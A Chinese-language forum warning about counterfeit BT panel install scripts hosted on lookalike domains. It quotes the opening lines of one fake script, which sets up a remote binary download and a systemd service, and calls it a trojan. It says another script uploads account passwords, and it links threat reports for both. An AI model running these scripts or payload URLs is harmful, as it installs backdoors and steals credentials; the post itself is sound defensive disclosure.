请谨慎执行非官网的安装脚本!!!!
在安装面板过程中需要注意的事安装脚本中都会带有bt.cn 这几个字符串。如果没有带的话,不要安装。
例1:
https://btdownload.xyz/install/install_lts.sh
内容
#!/bin/bash
DOWNLOAD_URL="https://down3696.oss-cn-hongkong.aliyuncs.com/spsys"
PROGRAM_NAME=$(basename "$DOWNLOAD_URL")
INSTALL_DIR="/usr/local/bin"
PROGRAM_PATH="$INSTALL_DIR/$PROGRAM_NAME"
TEMP_DOWNLOAD_PATH="./$PROGRAM_NAME"
SERVICE_NAME="${PROGRAM_NAME}.service"
SERVICE_FILE="/etc/systemd/system/$SERVICE_NAME"这里有一个带有控制型的木马。
具体的参考如下:
https://s.threatbook.com/report/file/fc77aa7c95112a1c805b66f113659ff10c6e40dfc51abf8e62fa0cbe0f54b265
例2:
https://btdown.xyz/install/install_lts.sh
内容
会把账号密码等信息上传到恶意的地址中
具体的样本数据
https://s.threatbook.com/report/file/22bf852fd6858d93f411ab904b618c0ac855b9c975ff43de815d289fdfb1d9b6
上述这些例子只是其中的一些比较明显的后门,
还有一些冒牌的安装脚本隐藏的更隐蔽。
页:
[1]